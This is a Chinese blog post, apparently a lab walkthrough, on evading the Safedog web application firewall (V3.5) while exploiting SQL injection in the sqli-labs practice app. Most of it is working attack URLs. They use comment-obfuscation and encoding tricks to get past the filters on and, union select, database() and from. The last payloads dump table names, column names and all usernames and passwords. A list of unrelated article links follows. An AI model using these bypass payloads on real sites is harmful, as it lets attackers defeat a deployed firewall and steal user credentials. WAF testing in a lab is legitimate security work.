当前位置：首页 > news >正文

安全狗V3.512048版本绕过

news 2026/3/31 12:45:12

安全狗安装

安全狗详细安装、遇见无此服务器解决、在windows中命令提示符中进入查看指定文件夹手动启动Apache_安全狗只支持 glibc_2.14 但是服务器是2.17_黑色地带(崛起)的博客-CSDN博客

安全狗 safedogwzApacheV3.5.exe

右键电脑右下角安全狗图标-->选择插件-->安装插件

以管理员身份运行cmd安装apache服务

httpd -k install -n apache2.4

在安装的时候提示有一个服务名不能为空，这里需要phpstudy调整至系统服务模式。

然后调出任务管理器界面，查看所有服务

将服务写上,安装成功之后，注意不要选择在线安装服务器安全狗，安装之后会显示启动web服务失败，这里将phpstudy重启即可

使用恶意的参数进行测试下，安全狗生效
http://192.168.126.137/sqli-lab/Less-1/?id=1' union select 1,2,3 -- +

测试单引号

判断闭合点为 '

http://192.168.110.130/sqli/Less-1/?id=1

http://192.168.110.130/sqli/Less-1/?id=1' #报错

添加注释后显示正常

http://192.168.110.130/sqli/Less-1/?id=1'-- -

测试and

直接用and 1=1发现被拦截

当只是有and时并没有拦截只有报错，说明and和1不能同时出现

用注释符去绕过，下面这俩个都可进行绕过

/*%2f!%2f!*/

and/*@%$^(*/ 1=1 --+

http://192.168.110.130/sqli/Less-1/?id=1' /*%2f!%2f!*/and 1=1 -- -

http://192.168.110.130/sqli/Less-1/?id=1' and/*@%$^(*/ 1=1 --+

union select 被拦截

order by 3判断字段数为3后，进行联合查询被拦截

http://192.168.110.130/sqli/Less-1/?id=1' order by 3 --+

http://192.168.110.130/sqli/Less-1/?id=1' union select 1,2, 3 --+

union select 被拦截

http://192.168.110.130/sqli/Less-1/?id=1' union select --+

union 没有被拦截

http://192.168.110.130/sqli/Less-1/?id=1' union--+

select正常说明一起查询会被拦截

http://192.168.110.130/sqli/Less-1/?id=1' select--+

使用注释符尝试绕过

http://192.168.110.130/sqli/Less-1/?id=1' union /*%2f!%2f!*/select --+

显示正常

http://192.168.110.130/sqli/Less-1/?id=1' union /*%2f!%2f!*/select 1,2,3 --+

database()被拦截

进行查询数据库，又被拦截

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,database() --+

直接使用内联注释符成功绕过

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,database/**/ () --+

接下来开始查表

http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表，

或者是：

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的表

from 过滤

输入查表字段被拦截，from为关键字，需要进行绕过

union /*%2f!%2f!*/select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+

正常

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,table_name--+

加上from后被拦截

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,table_name from--+

发现这里可以使用char()来绕过

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2, CHAR(102,114,111,109) --+

由于后面没发继续下去，fuzz出新绕过方法 /*!%23/*%0afrom*/

成功查询到表名

union /*%2f!%2f!*/select 1,2, group_concat(table_name) /*!%23/*%0afrom*/ information_schema.tables where table_schema=0x7365637572697479 --+

成功查询到列名

union /*%2f!%2f!*/select 1,2, group_concat(column_name) /*!%23/*%0afrom*/ information_schema.columns where table_name='users' --+

将全部字段查询出来

union /*%2f!%2f!*/select 1,2, group_concat(concat_ws(0x7e,username, password)) /*!%23/*%0afrom*/ security.users -- -

安全狗V3.512048版本绕过

安全狗安装

测试单引号

测试and

union select 被拦截

database()被拦截

from 过滤

相关文章：

安全狗V3.512048版本绕过

prometheus监控k8s kube-proxy target down

SPSS数据分析--假设检验的两种原假设取舍决定方式

Python实现猫狗分类

pjsip、pjsua2+bcg729 windows下编译java版本

尝试多数据表 sqlite

Keil出现Flash Timeout.Reset the Target and try it again.我有一种解决方法

纯粹即刻，畅享音乐搜索的轻松体验

动态规划之树形DP

嵌入式_GD32使用宏开关进行Debug串口打印调试

使用 GitHub Copilot 进行 Prompt Engineering 的初学者指南（译）

c++开发模式，享元模式

LLM大模型——langchain相关知识总结

【Python】数据可视化利器PyCharts在测试工作中的应用

AOP的实战（统一功能处理模块）

时间复杂度为O(n2)的三种简单排序算法

LeetCode 热题 100 JavaScript --226. 翻转二叉树

hive所有窗口函数详情总结

Talk | 新加坡国立大学博士生施宇钧：DragDiffusion-基于扩散模型的关键点拖拽图片编辑

22 | 贝叶斯分类算法

Ostrakon-VL-8B功能体验：图文对话模型在零售场景的真实表现

73：L的程序安全：蓝队的规范防御

古基因组学：降解DNA的损伤模式、污染评估与群体历史推断

西门子PLC存储区全解析：从M区到DB块的实战避坑指南

进程间通信（IPC）：原理、场景与选型

GLM-4.1V-9B-Base部署教程：NVIDIA驱动版本兼容性验证与降级方案

Elsevier Tracker：告别投稿焦虑，3分钟实现学术稿件智能追踪

Windows记事本CVE-2026-20841漏洞分析：从命令注入根因、全链路攻击链到企业级纵深防御的全维度深度复盘

3天掌握MediaPipe：从零开始构建实时AI应用的终极指南

SmolVLA代码审查助手：自动检测C语言基础代码缺陷